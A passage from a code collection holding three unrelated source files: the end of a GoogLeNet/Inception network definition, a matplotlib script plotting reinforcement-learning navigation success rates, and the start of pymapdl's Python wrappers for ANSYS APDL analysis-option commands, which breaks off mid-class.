.conv(1, 1, 64, 1, 1, name='inception_4b_pool_proj'))
(self.feed('inception_4b_1x1',
'inception_4b_3x3',
'inception_4b_5x5',
'inception_4b_pool_proj')
.concat(3, name='inception_4b_output')
.conv(1, 1, 128, 1, 1, name='inception_4c_1x1'))
(self.feed('inception_4b_output')
.conv(1, 1, 128, 1, 1, name='inception_4c_3x3_reduce')
.conv(3, 3, 256, 1, 1, name='inception_4c_3x3'))
(self.feed('inception_4b_output')
.conv(1, 1, 24, 1, 1, name='inception_4c_5x5_reduce')
.conv(5, 5, 64, 1, 1, name='inception_4c_5x5'))
(self.feed('inception_4b_output')
.max_pool(3, 3, 1, 1, name='inception_4c_pool')
.conv(1, 1, 64, 1, 1, name='inception_4c_pool_proj'))
(self.feed('inception_4c_1x1',
'inception_4c_3x3',
'inception_4c_5x5',
'inception_4c_pool_proj')
.concat(3, name='inception_4c_output')
.conv(1, 1, 112, 1, 1, name='inception_4d_1x1'))
(self.feed('inception_4c_output')
.conv(1, 1, 144, 1, 1, name='inception_4d_3x3_reduce')
.conv(3, 3, 288, 1, 1, name='inception_4d_3x3'))
(self.feed('inception_4c_output')
.conv(1, 1, 32, 1, 1, name='inception_4d_5x5_reduce')
.conv(5, 5, 64, 1, 1, name='inception_4d_5x5'))
(self.feed('inception_4c_output')
.max_pool(3, 3, 1, 1, name='inception_4d_pool')
.conv(1, 1, 64, 1, 1, name='inception_4d_pool_proj'))
(self.feed('inception_4d_1x1',
'inception_4d_3x3',
'inception_4d_5x5',
'inception_4d_pool_proj')
.concat(3, name='inception_4d_output')
.conv(1, 1, 256, 1, 1, name='inception_4e_1x1'))
(self.feed('inception_4d_output')
.conv(1, 1, 160, 1, 1, name='inception_4e_3x3_reduce')
.conv(3, 3, 320, 1, 1, name='inception_4e_3x3'))
(self.feed('inception_4d_output')
.conv(1, 1, 32, 1, 1, name='inception_4e_5x5_reduce')
.conv(5, 5, 128, 1, 1, name='inception_4e_5x5'))
(self.feed('inception_4d_output')
.max_pool(3, 3, 1, 1, name='inception_4e_pool')
.conv(1, 1, 128, 1, 1, name='inception_4e_pool_proj'))
(self.feed('inception_4e_1x1',
'inception_4e_3x3',
'inception_4e_5x5',
'inception_4e_pool_proj')
.concat(3, name='inception_4e_output')
.max_pool(3, 3, 2, 2, name='pool4_3x3_s2')
.conv(1, 1, 256, 1, 1, name='inception_5a_1x1'))
(self.feed('pool4_3x3_s2')
.conv(1, 1, 160, 1, 1, name='inception_5a_3x3_reduce')
.conv(3, 3, 320, 1, 1, name='inception_5a_3x3'))
(self.feed('pool4_3x3_s2')
.conv(1, 1, 32, 1, 1, name='inception_5a_5x5_reduce')
.conv(5, 5, 128, 1, 1, name='inception_5a_5x5'))
(self.feed('pool4_3x3_s2')
.max_pool(3, 3, 1, 1, name='inception_5a_pool')
.conv(1, 1, 128, 1, 1, name='inception_5a_pool_proj'))
(self.feed('inception_5a_1x1',
'inception_5a_3x3',
'inception_5a_5x5',
'inception_5a_pool_proj')
.concat(3, name='inception_5a_output')
.conv(1, 1, 384, 1, 1, name='inception_5b_1x1'))
(self.feed('inception_5a_output')
.conv(1, 1, 192, 1, 1, name='inception_5b_3x3_reduce')
.conv(3, 3, 384, 1, 1, name='inception_5b_3x3'))
(self.feed('inception_5a_output')
.conv(1, 1, 48, 1, 1, name='inception_5b_5x5_reduce')
.conv(5, 5, 128, 1, 1, name='inception_5b_5x5'))
(self.feed('inception_5a_output')
.max_pool(3, 3, 1, 1, name='inception_5b_pool')
.conv(1, 1, 128, 1, 1, name='inception_5b_pool_proj'))
(self.feed('inception_5b_1x1',
'inception_5b_3x3',
'inception_5b_5x5',
'inception_5b_pool_proj')
.concat(3, name='inception_5b_output')
.avg_pool(7, 7, 1, 1, padding='VALID', name='pool5_7x7_s1')
.fc(1000, relu=False, name='loss3_classifier')
.softmax(name='prob'))
|
tools/draw_success_rate.py
|
CAVED123/-navbot
| 154 |
79527
|
#!/usr/bin/python
# -*- coding: UTF-8 -*-
import matplotlib.pyplot as plt
plt.rcParams['font.sans-serif'] = ['Times New Roman'] # 如果要显示中文字体,则在此处设为:SimHei
plt.rcParams['axes.unicode_minus'] = False # 显示负号
plt.figure(figsize=(10, 6))
plt.grid(linestyle="--") # 设置背景网格线为虚线
ax = plt.gca()
ax.spines['top'].set_visible(False) # 去掉上边框
ax.spines['right'].set_visible(False) # 去掉右边框
record_path = '../materials/record/'
def main():
f = open(record_path + 'PPO_nav1.txt', 'r')
lines = f.readlines()
success = []
successes = []
for i in range(len(lines)):
if i < 100:
success.append(0)
else:
for j in range(100):
line = lines[i-j] # eg: '[432.1290540951935, 248, True]'
data = line.split()
# successes.append(bool(data[2][:-1])) # bool('False') is True!
success.append(data[2][:-1] == str('True'))
success_rate = sum(success)
successes.append(success_rate)
success = []
f.close()
f2 = open(record_path + 'E2E_PPO_nav1.txt', 'r')
lines2 = f2.readlines()
success2 = []
successes2 = []
for i in range(100, len(lines2)):
if i < 100:
success2.append(0)
else:
for j in range(100):
line2 = lines2[i-j] # eg: '[432.1290540951935, 248, True]'
data2 = line2.split()
# successes.append(bool(data[2][:-1])) # bool('False') is True!
success2.append(data2[2][:-1] == str('True'))
success_rate2 = sum(success2)
successes2.append(success_rate2)
success2 = []
f2.close()
plt.plot(range(len(successes)), successes, color="blue", label="Proposed", linewidth=1.5)
plt.plot(range(len(successes2)), successes2, color="green", label="Baseline", linewidth=1.5)
size = 22
plt.xticks(fontsize=size) # 默认字体大小为10
plt.yticks(fontsize=size)
# plt.title("example", fontsize=12, fontweight='bold') # 默认字体大小为12
plt.xlabel("episode", fontsize=size)
plt.ylabel("success rate(%)", fontsize=size)
plt.title('maze1', fontsize=size)
# plt.legend() # 显示各曲线的图例
plt.legend(loc=4, numpoints=1) # lower right
leg = plt.gca().get_legend()
ltext = leg.get_texts()
plt.setp(ltext, fontsize=size) # 设置图例字体的大小和粗细
axes = plt.gca()
# axes.set_xlim([None, None]) # 限定X轴的范围
plt.savefig('../result/maze1_dense_success.png')
plt.show()
main()
|
src/ansys/mapdl/core/_commands/solution/analysis_options.py
|
Miiicah/pymapdl
| 194 |
79528
|
<gh_stars>100-1000
from typing import Optional
from ansys.mapdl.core.mapdl_types import MapdlInt
class AnalysisOptions:
def abextract(self, mode1="", mode2="", **kwargs):
"""Extracts the alpha-beta damping multipliers for Rayleigh damping.
APDL Command: ABEXTRACT
Parameters
----------
mode1
First mode number.
mode2
Second mode number.
Notes
-----
ABEXTRACT calls the command macro DMPEXT to extract the damping ratio
of MODE1 and MODE2 and then computes the Alpha and Beta damping
multipliers for use in a subsequent structural harmonic or transient
analysis. See Damping in the Structural Analysis Guide for more
information on the alpha and beta damping multipliers. The damping
multipliers are stored in parameters ALPHADMP and BETADMP and can be
applied using the ALPHAD and BETAD commands. Before calling ABEXTRACT,
you must issue RMFLVEC to extract the modal displacements. In addition,
a node component FLUN must exist from all FLUID136 nodes. See
Introduction for more information on thin film analyses.
This command is also valid in PREP7.
Distributed ANSYS Restriction: This command is not supported in
Distributed ANSYS.
"""
command = f"ABEXTRACT,{mode1},{mode2}"
return self.run(command, **kwargs)
def accoption(self, activate="", **kwargs):
"""Specifies GPU accelerator capability options.
APDL Command: ACCOPTION
Parameters
----------
activate
Activates the GPU accelerator capability within the equation
solvers.
Do not use GPU accelerator. - Use GPU accelerator.
Notes
-----
The GPU accelerator capability requires specific hardware to be
installed on the machine. See the appropriate ANSYS, Inc. Installation
Guide (Windows or Linux) for a list of supported GPU hardware. Use of
this capability also requires HPC licensing. For more information, see
GPU Accelerator Capability in the Parallel Processing Guide.
The GPU accelerator capability is available for the sparse direct
solver and the PCG and JCG iterative solvers. Static, buckling, modal,
full harmonic, and full transient analyses are supported. For buckling
analyses, the Block Lanczos and Subspace eigensolvers are supported.
For modal analyses, only the Block Lanczos, PCG Lanczos, Subspace,
Unsymmetric, and Damped eigensolvers are supported. Activating this
capability when using other equation solvers or other analysis types
has no effect.
The GPU accelerator capability is supported only on the Windows 64-bit
and Linux 64-bit platforms.
"""
command = f"ACCOPTION,{activate}"
return self.run(command, **kwargs)
def adams(self, nmodes="", kstress="", kshell="", **kwargs):
"""Performs solutions and writes flexible body information to a modal
APDL Command: ADAMS
neutral file (Jobname.MNF) for use in an ADAMS analysis.
Parameters
----------
nmodes
Number of normal modes to be written to Jobname.MNF file (no
default).
kstress
Specifies whether to write stress or strain results:
0 - Do not write stress or strain results (default).
1 - Write stress results.
2 - Write strain results.
3 - Write both stress and strain results.
kshell
Shell element output location. This option is valid only for shell
elements.
0, 1 - Shell top surface (default).
2 - Shell middle surface.
3 - Shell bottom surface.
Notes
-----
ADAMS invokes a predefined ANSYS macro that solves a series of analyses
and then writes the modal neutral file, Jobname.MNF. This file can be
imported into the ADAMS program in order to perform a rigid body
dynamics simulation. For detailed information on how to use the ADAMS
command macro to create a modal neutral file, see Rigid Body Dynamics
and the ANSYS-ADAMS Interface in the Substructuring Analysis Guide.
Before running the ADAMS command macro, you must specify the units with
the /UNITS command. The interface points should be the only selected
nodes when the command macro is initiated. (Interface points are nodes
where constraints may be applied in ADAMS.) Only selected elements will
be considered in the calculations.
By default, stress and strain data is transferred to the ADAMS program
for all nodes, as specified by the KSTRESS value. If you want to
transfer stress/strain data for only a subset of nodes, select the
desired subset and create a node component named "STRESS" before
running the ADAMS command macro. For example, you may want to select
exterior nodes for the purpose of visualization in the ADAMS program.
The default filename for the modal neutral file is Jobname.MNF. In
interactive (GUI) mode, you can specify a filename other than
Jobname.MNF. In batch mode, there is no option to change the filename,
and the modal neutral file is always written to Jobname.MNF.
"""
command = f"ADAMS,{nmodes},{kstress},{kshell}"
return self.run(command, **kwargs)
def antype(self, antype="", status="", ldstep="", substep="", action="", **kwargs):
"""Specifies the analysis type and restart status.
APDL Command: ANTYPE
Parameters
----------
antype
Analysis type (defaults to the previously specified analysis type,
or to STATIC if none specified):
STATIC or 0 - Perform a static analysis. Valid for all degrees of freedom.
BUCKLE or 1 - Perform a buckling analysis. Implies that a previous static solution was
performed with prestress effects calculated
(PSTRES,ON). Valid for structural degrees of freedom
only.
MODAL or 2 - Perform a modal analysis. Valid for structural and fluid degrees of freedom.
HARMIC or 3 - Perform a harmonic analysis. Valid for structural, fluid, magnetic, and
electrical degrees of freedom.
TRANS or 4 - Perform a transient analysis. Valid for all degrees of freedom.
SUBSTR or 7 - Perform a substructure analysis. Valid for all degrees of freedom.
SPECTR or 8 - Perform a spectrum analysis. Implies that a previous modal analysis was
performed. Valid for structural degrees of freedom
only.
status
Specifies the status of the analysis (new or restart):
NEW - Specifies a new analysis (default). If NEW, the remaining fields on this
command are ignored.
RESTART - Specifies a restart of a previous analysis. Valid for static, modal, and
transient (full or mode-superposition method) analyses.
For more information about restarting static and
transient analyses, see Multiframe Restart in the Basic
Analysis Guide. For more information on restarting a
modal analysis, see Modal Analysis Restart in the Basic
Analysis Guide.
Multiframe restart is also valid for harmonic analysis, but is limited to 2-D magnetic analysis only. - A substructure analysis (backsubstitution method only) can be restarted for the
purpose of generating additional load vectors.
For more information, see the SEOPT command and
Applying Loads and Creating the Superelement
Matrices in the Substructuring Analysis Guide.
VTREST - Specifies the restart of a previous VT Accelerator analysis. Valid only with
Antype = STATIC, HARMIC, or TRANS. For more information,
see VT Accelerator Re-run in the Basic Analysis Guide.
ldstep
Specifies the load step at which a multiframe restart begins.
substep
Specifies the substep at which a multiframe restart begins.
action
Specifies the manner of a multiframe restart.
CONTINUE - The program continues the analysis based on the specified LDSTEP and SUBSTEP
(default). The current load step is continued. If the
end of the load step is encountered in the .Rnnn file, a
new load step is started. The program deletes all .Rnnn
files, or .Mnnn files for mode-superposition transient
analyses, beyond the point of restart and updates the
.LDHI file if a new load step is encountered.
ENDSTEP - At restart, force the specified load step (LDSTEP) to end at the specified
substep (SUBSTEP), even though the end of the current
load step has not been reached. At the end of the
specified substep, all loadings are scaled to the level
of the current ending and stored in the .LDHI file. A run
following this ENDSTEP starts a new load step. This
capability allows you to change the load level in the
middle of a load step. The program updates the .LDHI file
and deletes all .Rnnn files, or .Mnnn files for mode-
superposition transient analyses, beyond the point of
ENDSTEP. The .Rnnn or .Mnnn file at the point of ENDSTEP
are rewritten to record the rescaled load level.
RSTCREATE - At restart, retrieve information to be written to the results file for the
specified load step (LDSTEP) and substep (SUBSTEP). Be
sure to use OUTRES to write the results to the
results file. This action does not affect the .LDHI or
.Rnnn files. Previous items stored in the results file
at and beyond the point of RSTCREATE are deleted. This
option cannot be used to restart a mode-superposition
transient analysis.
PERTURB - At restart, a linear perturbation analysis (static, modal, buckling, or full
harmonic) is performed for the specified load step
(LDSTEP) and substep (SUBSTEP). This action does not
affect the .LDHI, .Rnnn, or .RST files.
Notes
-----
If using the ANTYPE command to change the analysis type in the same
SOLVE session, the program issues the following message: "Some analysis
options have been reset to their defaults. Please verify current
settings or respecify as required." Typically, the program resets
commands such as NLGEOM and EQSLV to their default values.
The analysis type (Antype) cannot be changed if a restart is specified.
Always save parameters before doing a restart. For more information on
the different types of restart, see Restarting an Analysis in the Basic
Analysis Guide.
This command is also valid in PREP7.
The ANSYS Professional - Nonlinear Structural (PRN) product supports
the Antype = TRANS option for mode-superposition (TRNOPT,MSUP) analyses
only.
"""
command = f"ANTYPE,{antype},{status},{ldstep},{substep},{action}"
return self.run(command, **kwargs)
def ascres(self, opt="", **kwargs):
"""Specifies the output type for an acoustic scattering analysis.
APDL Command: ASCRES
Parameters
----------
opt
Output option:
TOTAL - Output the total pressure field (default).
SCAT - Output the scattered pressure field.
Notes
-----
Use the ASCRES command to specify the output type for an acoustic
scattering analysis.
The scattered option (Opt = SCAT) provides a scattered pressure output,
psc, required for calculating target strength (TS).
The default behavior (Opt = TOTAL) provides a sum of the incident and
scattering fields, ptotal = pinc + psc.
Issue the AWAVE command to define the incident pressure pinc. If the
AWAVE command is defined with Opt2 = INT, only the total pressure field
is output regardless of the ASCRES,Opt command.
"""
command = f"ASCRES,{opt}"
return self.run(command, **kwargs)
def asol(self, lab="", opt="", **kwargs):
"""Specifies the output type of an acoustic scattering analysis.
APDL Command: ASOL
Parameters
----------
lab
Acoustic solver specification (no default):
SCAT - Set acoustic solver to the scattered field formulation.
opt
Option identifying an acoustic solver status:
OFF - Deactivate the specified acoustic solver (default).
ON - Activate the specified acoustic solver.
Notes
-----
Use the ASOL command to activate the specified acoustic solution
process.
The scattered option (Lab = SCAT) sets the acoustic solver to the
scattered-pressure field formulation.
Issue the AWAVE command to define the incident pressure pinc. If the
AWAVE command is defined with Opt2 = INT, the acoustic solver is set to
the scattered field formulation regardless of the ASOL command issued.
"""
command = f"ASOL,{lab},{opt}"
return self.run(command, **kwargs)
def bcsoption(self, memory_option="", memory_size="", solve_info="", **kwargs):
"""Sets memory option for the sparse solver.
APDL Command: BCSOPTION
Parameters
----------
memory_option
Memory allocation option:
DEFAULT - Use the default memory allocation strategy for
the sparse solver. The default strategy attempts
to run in the INCORE memory mode. If there is
not enough available physical memory when the
solver starts to run in the INCORE memory mode,
the solver will then attempt to run in the
OUTOFCORE memory mode.
INCORE - Use a memory allocation strategy in the sparse
solver that will attempt to obtain enough memory
to run with the entire factorized matrix in
memory. This option uses the most amount of
memory and should avoid doing any I/O. By
avoiding I/O, this option achieves optimal solver
performance. However, a significant amount of
memory is required to run in this mode, and it is
only recommended on machines with a large amount
of memory. If the allocation for in-core memory
fails, the solver will automatically revert to
out-of-core memory mode.
OUTOFCORE - Use a memory allocation strategy in the sparse
solver that will attempt to allocate only
enough work space to factor each individual
frontal matrix in memory, but will store the
entire factorized matrix on disk. Typically,
this memory mode results in poor performance
due to the potential bottleneck caused by the
I/O to the various files written by the
solver.
FORCE - This option, when used in conjunction with the
Memory_Size option, allows you to force the sparse
solver to run with a specific amount of
memory. This option is only recommended for the
advanced user who understands sparse solver memory
requirements for the problem being solved,
understands the physical memory on the system, and
wants to control the sparse solver memory usage.
memory_size
Initial memory size allocation for the sparse solver in
MB. This argument allows you to tune the sparse solver
memory and is not generally required. Although there is no
upper limit for Memory_Size, the Memory_Size setting
should always be well within the physical memory
available, but not so small as to cause the sparse solver
to run out of memory. Warnings and/or errors from the
sparse solver will appear if this value is set too low. If
the FORCE memory option is used, this value is the amount
of memory allocated for the entire duration of the sparse
solver solution.
solve_info
Solver output option:
OFF - Turns off additional output printing from the sparse
solver (default).
PERFORMANCE - Turns on additional output printing from the
sparse solver, including a performance
summary and a summary of file I/O for the
sparse solver. Information on memory usage
during assembly of the global matrix (that
is, creation of the Jobname.FULL file) is
also printed with this option.
Notes
-----
This command controls options related to the sparse solver in
all analysis types where the sparse solver can be used. It
also controls the Block Lanczos eigensolver in a modal or
buckling analysis.
The sparse solver runs from one large work space (that is, one
large memory allocation). The amount of memory required for
the sparse solver is unknown until the matrix structure is
preprocessed, including equation reordering. The amount of
memory allocated for the sparse solver is then dynamically
adjusted to supply the solver what it needs to compute the
solution.
If you have a very large memory system, you may want to try
selecting the INCORE memory mode for larger jobs to improve
performance. When running the sparse solver on a machine with
very slow I/O performance (for example, slow hard drive
speed), you may want to try using the INCORE memory mode to
achieve better performance. However, doing so may require much
more memory compared to running in the OUTOFCORE memory mode.
Running with the INCORE memory mode is best for jobs which
comfortably fit within the limits of the physical memory on a
given system. If the sparse solver work space exceeds physical
memory size, the system will be forced to use virtual memory
(or the system page/swap file). In this case, it is typically
more efficient to run with the OUTOFCORE memory mode. Assuming
the job fits comfortably within the limits of the machine,
running with the INCORE memory mode is often ideal for jobs
where repeated solves are performed for a single matrix
factorization. This occurs in a modal or buckling analysis or
when doing multiple load steps in a linear, static analysis.
For repeated runs with the sparse solver, you may set the
initial sparse solver memory allocation to the amount required
for factorization. This strategy reduces the frequency of
allocation and reallocation in the run to make the INCORE
option fully effective. If you have a very large memory
system, you may use the Memory_Size argument to increase the
maximum size attempted for in-core runs.
"""
command = f"BCSOPTION,,{memory_option},{memory_size},,,{solve_info}"
return self.run(command, **kwargs)
def cgrow(self, action="", par1="", par2="", **kwargs):
"""Defines crack-growth information
APDL Command: CGROW
Parameters
----------
action
Specifies the action for defining or manipulating crack-growth
data:
NEW - Initiate a new set of crack-growth simulation data (default).
CID - Specify the crack-calculation (CINT) ID for energy-release rates to be used in
the fracture criterion calculation.
FCOPTION - Specify the fracture criterion for crack-growth/delamination.
CPATH - Specify the element component for crack growth.
DTIME - Specify the initial time step for crack growth.
DTMIN - Specify the minimum time step for crack growth.
DTMAX - Specify the maximum time step for crack growth.
FCRAT - Fracture criterion ratio (fc).
STOP - Stops the analysis when the specified maximum crack extension is reached.
METHOD - Define the method of crack propagation.
Notes
-----
When Action = NEW, the CGROW command initializes a crack-growth
simulation set. Subsequent CGROW commands define the parameters
necessary for the simulation.
For multiple cracks, issue multiple CGROW,NEW commands (and any
subsequent CGROW commands necessary to define the parameters) for each
crack.
If the analysis is restarted (ANTYPE,,RESTART), the CGROW command must
be re-issued.
For additional details on this command, see
https://www.mm.bme.hu/~gyebro/files/ans_help_v182/ans_cmd/Hlp_C_CGROW.html
"""
command = f"CGROW,{action},{par1},{par2}"
return self.run(command, **kwargs)
def cmatrix(
self, symfac="", condname="", numcond="", grndkey="", capname="", **kwargs
):
"""Performs electrostatic field solutions and calculates the
self and mutual capacitances between multiple conductors.x
APDL Command: CMATRIX
Parameters
----------
symfac
Geometric symmetry factor. Capacitance values are scaled by this
factor which represents the fraction of the total device modeled.
Defaults to 1.
condname
Alphanumeric prefix identifier used in defining named conductor
components.
numcond
Total Number of Components. If a ground is modeled, it is to be
included as a component. If a ground is not modeled, but infinite
elements are used to model the far-field ground, a named component
for the far-field ground is not required.
grndkey
Ground key:
0 - Ground is one of the components, which is not at infinity.
1 - Ground is at infinity (modeled by infinite elements).
capname
Array name for computed capacitance matrix. Defaults to CMATRIX.
Notes
-----
To invoke the CMATRIX macro, the exterior nodes of each conductor must
be grouped into individual components using the CM command. Each set
of independent components is assigned a component name with a common
prefix followed by the conductor number. A conductor system with a
ground must also include the ground nodes as a component. The ground
component is numbered last in the component name sequence.
A ground capacitance matrix relates charge to a voltage vector. A
ground matrix cannot be applied to a circuit modeler. The lumped
capacitance matrix is a combination of lumped "arrangements" of
voltage differences between conductors. Use the lumped capacitance
terms in a circuit modeler to represent capacitances between
conductors.
Enclose all name-strings in single quotes in the CMATRIX command line.
See the Mechanical APDL Theory Reference and HMAGSOLV in the Low-
Frequency Electromagnetic Analysis Guide for details.
This command does not support multiframe restarts.
"""
command = f"CMATRIX,{symfac},'{condname}',{numcond},{grndkey},'{capname}'"
return self.run(command, **kwargs)
def cmsopt(
self,
cmsmeth="",
nmode="",
freqb="",
freqe="",
fbddef="",
fbdval="",
iokey="",
**kwargs,
):
"""Specifies component mode synthesis (CMS) analysis options.
APDL Command: CMSOPT
Parameters
----------
cmsmeth
The component mode synthesis method to use. This value is required.
FIX - Fixed-interface method.
FREE - Free-interface method.
RFFB - Residual-flexible free-interface method.
nmode
The number of normal modes extracted and used in the superelement
generation. This value is required; the minimum is 1.
freqb
Beginning, or lower end, of frequency range of interest. This value
is optional.
freqe
Ending, or upper end, of frequency range of interest. This value is
optional.
fbddef
In a free-interface (CMSMETH = FREE) or residual-flexible free-
interface (CMSMETH = RFFB) CMS analysis, the method to use for
defining free body modes:
FNUM - The number (FDBVAL) of rigid body modes in the calculation.
FTOL - Employ a specified tolerance (FDBVAL) to determine rigid body modes in the
calculation.
FAUTO - Automatically determine rigid body modes in the calculation. This method is the
default.
RIGID - If no rigid body modes exist, define your own via the RIGID command.
fbdval
In a free-interface CMS analysis (CMSMETH = FREE), the number of
rigid body modes if FBDDEF = fnum (where the value is an integer
from 0 through 6), or the tolerance to employ if FBDDEF = ftol
(where the value is a positive real number representing rad/sec).
This value is required only when FBDDEF = fnum or FBDDEF = ftol;
otherwise, any specified value is ignored.
iokey
Output key to control writing of the transformation matrix to the
.TCMS file (FIX or FREE methods) or body properties to the .EXB
file (FIX method).
TCMS - Write the transformation matrix of the nodal component defined by the OUTPR
command to a .TCMS file. Refer to TCMS File Format in the
Programmer's Reference for more information on the this
file.
EXB - Write a body property input file (.EXB file) containing the condensed
substructure matrices and other body properties for use with
AVL EXCITE. Refer to ANSYS Interface to AVL EXCITE in the
Substructuring Analysis Guide for more information.
Notes
-----
CMS employs the Block Lanczos eigensolution method in the generation
pass.
CMS supports damping matrix reduction when a damping matrix exists. Set
the matrix generation key to 3 (SEOPT,Sename,SEMATR) to generate and
then reduce stiffness, mass, and damping matrices.
CMS does not support the SEOPT,,,,,RESOLVE command. Instead, ANSYS sets
the expansion method for the expansion pass (EXPMTH) to BACKSUB.
For more information about performing a CMS analysis, see Component
Mode Synthesis in the Substructuring Analysis Guide.
If IOKEY = TCMS is used to output the transformation matrix, then only
ITEM = NSOL is valid in the OUTPR command. In the interactive
sessions, the transformation matrix will not be output if the model has
more than 10 elements.
This command is also valid in /PREP7.
"""
command = f"CMSOPT,{cmsmeth},{nmode},{freqb},{freqe},{fbddef},{fbdval},{iokey}"
return self.run(command, **kwargs)
def cncheck(
self,
option="",
rid1="",
rid2="",
rinc="",
intertype="",
trlevel="",
cgap="",
cpen="",
ioff="",
**kwargs,
):
"""Provides and/or adjusts the initial status of contact pairs.
APDL Command: CNCHECK
Parameters
----------
option
Option to be performed:
* ``"DETAIL"`` : List all contact pair properties (default).
* ``"SUMMARY"`` : List only the open/closed status for each
contact pair.
* ``"POST"`` : Execute a partial solution to write the initial
contact configuration to the Jobname.RCN file.
* ``"ADJUST"`` : Physically move contact nodes to the target
in order to close a gap or reduce penetration. The initial
adjustment is converted to structural displacement values
(UX, UY, UZ) and stored in the Jobname.RCN file.
* ``"MORPH"`` : Physically move contact nodes to the target in
order to close a gap or reduce penetration, and also morph
the underlying solid mesh. The initial adjustment of contact
nodes and repositioning of solid element nodes due to mesh
morphing are converted to structural displacement values
(UX, UY, UZ) and stored in the Jobname.RCN file.
* ``"RESET"`` : Reset target element and contact element key
options and real constants to their default values. This
option is not valid for general contact.
* ``"AUTO"`` : Automatically sets certain real constants and
key options to recommended values or settings in order to
achieve better convergence based on overall contact pair
behaviors. This option is not valid for general contact.
* ``"TRIM"`` : Trim contact pair (remove certain contact and
target elements).
* ``"UNSE"`` : Unselect certain contact and target elements.
rid1, rid2, rinc
For pair-based contact, the range of real constant pair IDs
for which Option will be performed. If RID2 is not specified,
it defaults to RID1. If no value is specified, all contact
pairs in the selected set of elements are considered.
For general contact (InterType = GCN), RID1 and RID2 are
section IDs associated with general contact surfaces instead
of real constant IDs. If RINC = 0, the Option is performed
between the two sections, RID1 and RID2. If RINC > 0, the
Option is performed among all specified sections (RID1 to RID2
with increment of RINC).
intertype
The type of contact interface (pair-based versus general
contact) to be considered; or the type of contact pair to be
trimmed/unselected/auto-set.
The following labels specify the type of contact interface:
* ``""`` : (blank) Include all contact definitions (pair-based
and general contact).
* ``"GCN"`` : Include general contact definitions only (not valid when Option = RESET or AUTO).
The following labels specify the type of contact pairs to be
trimmed/unselected/auto-set (used only when Option = TRIM,
UNSE, or AUTO, and only for pair-based contact definitions):
* ``"ANY"`` : All types (default).
* ``"MPC"`` : MPC-based contact pairs (KEYOPT(2) = 2).
* ``"BOND"`` : Bonded contact pairs (KEYOPT(12) = 3, 5, 6).
* ``"NOSP"`` : No separation contact pairs (KEYOPT(12) = 2, 4).
* ``"INAC"`` : Inactive contact pairs (symmetric contact pairs for MPC contact or KEYOPT(8) = 2).
* ``"TRlevel"`` : mming level (used only when Option = TRIM, UNSE, or MORPH):
* ``"(blank)"`` : Normal trimming (default): remove/unselect contact and target elements which are in far-field.
* ``"AGGRE"`` : Aggressive trimming: remove/unselect contact and target elements which are in far-field, and certain elements in near-field.
cgap
They are only valid when Option = ADJUST or MORPH. Control
parameter for opening gap. Close the opening gap if the
absolute value of the gap is smaller than the CGAP value. CGAP
defaults to ``0.25*PINB`` (where PINB is the pinball radius) for
bonded and no-separation contact; otherwise it defaults to the
value of real constant ICONT.
CPEN
They are only valid when Option = ADJUST or MORPH. Control
parameter for initial penetration. Close the initial
penetration if the absolute value of the penetration is
smaller than the CPEN value. CPEN defaults to ``0.25*PINB`` (where
PINB is the pinball radius) for any type of interface behavior
(either bonded or standard contact).
IOFF
They are only valid when Option = ADJUST or MORPH. Control
parameter for initial adjustment. Input a positive value to
adjust the contact nodes towards the target surface with a
constant interference distance equal to IOFF. Input a negative
value to adjust the contact node towards the target surface
with a uniform gap distance equal to the absolute value of
IOFF.
Notes
-----
The CNCHECK command provides information for surface-to-surface,
node-to-surface, and line-to-line contact pairs (element types
TARGE169, TARGE170, CONTA171, CONTA172, CONTA173, CONTA174,
CONTA175, CONTA176, CONTA177). All contact and target elements of
interest, along with the solid elements and nodes attached to
them, must be selected for the command to function properly. For
performance reasons, the program uses a subset of nodes and
elements based on the specified contact regions (RID1, RID2, RINC)
when executing the CNCHECK command.
For additional details, see the notes section at:
https://www.mm.bme.hu/~gyebro/files/ans_help_v182/ans_cmd/Hlp_C_CNCHECK.html
"""
command = f"CNCHECK,{option},{rid1},{rid2},{rinc},{intertype},{trlevel},{cgap},{cpen},{ioff}"
return self.run(command, **kwargs)
def cnkmod(self, itype="", knum="", value="", **kwargs):
"""Modifies contact element key options.
APDL Command: CNKMOD
Parameters
----------
itype
Contact element type number as defined on the ET command.
knum
Number of the KEYOPT to be modified (KEYOPT(KNUM)).
value
Value to be assigned to the KEYOPT.
Notes
-----
The CNKMOD command has the same syntax as the KEYOPT command. However,
it is valid only in the SOLUTION processor. This command is intended
only for use in a linear perturbation analysis, and can only be used to
modify certain contact element KEYOPT values as described below.
Modifying KEYOPT(12)
One use for this command is to modify contact interface behavior
between load steps in a linear perturbation analysis; it allows the
user to control the contact status locally per contact pair. For this
application, this command is limited to changing the contact interface
behavior key option: KEYOPT(12) of CONTA171, CONTA172, CONTA173,
CONTA174, CONTA175, CONTA176, and CONTA177; and KEYOPT(10) of CONTA178.
When used for this purpose, the command adjusts the contact status from
the linear perturbation base analysis (at the point of restart) as
described in the table below. Note that CNKMOD allows you to take
points in the base analysis that are near contact (within the pinball
region) and modify them to be treated as "in contact" in the
perturbation analysis; see the "1 - near-field" row with KEYOPT(12)
values set to 4 or 5. CNKMOD also allows you to take points that are
sliding in the base analysis and treat them as sticking in the
perturbation analysis, irrespective of the MU value; see the "2 -
sliding" row with KEYOPT(12) values set to 1,3, 5, or 6.
Table: 128:: : Adjusted Contact Status with CNKMOD is Issued
(if outside of the adjusted pinball region)
(if inside of the adjusted pinball region)
(if outside of the adjusted pinball region)
(if inside of the adjusted pinball region)
If an open gap exists at the end of the previous load step and the
contact status is adjusted as sliding or sticking due to a "bonded" or
"no separation" contact behavior definition, then the program will
treat it as near-field contact when executing CNKMOD in the subsequent
load steps.
In the linear perturbation analysis procedure, contact status can also
be controlled or modified by the PERTURB command. The contact status
always follows local controls defined by the CNKMOD command first, and
is then adjusted by the global sticking or bonded setting (ContKey =
STICKING or BONDED) on the PERTURB command (see the PERTURB command for
details).
Modifying KEYOPT(3)
Another use for this command is to change the units of normal contact
stiffness (contact element real constant FKN) in a linear perturbation
modal analysis that is used to model brake squeal. For contact elements
CONTA171, CONTA172, CONTA173, and CONTA174, KEYOPT(3) controls the
units of normal contact stiffness. You can issue the command
CNKMOD,ITYPE,3,1 during the first phase of the linear perturbation
analysis in order to change the units of normal contact stiffness from
FORCE/LENGTH3 (in the base analysis) to FORCE/LENGTH. Note that
KEYOPT(3) = 1 is valid only when a penalty-based algorithm is used
(KEYOPT(2) = 0 or 1) and the absolute normal contact stiffness value is
explicitly specified (that is, a negative value input for real constant
FKN).
"""
command = f"CNKMOD,{itype},{knum},{value}"
return self.run(command, **kwargs)
def cntr(self, option="", key="", **kwargs):
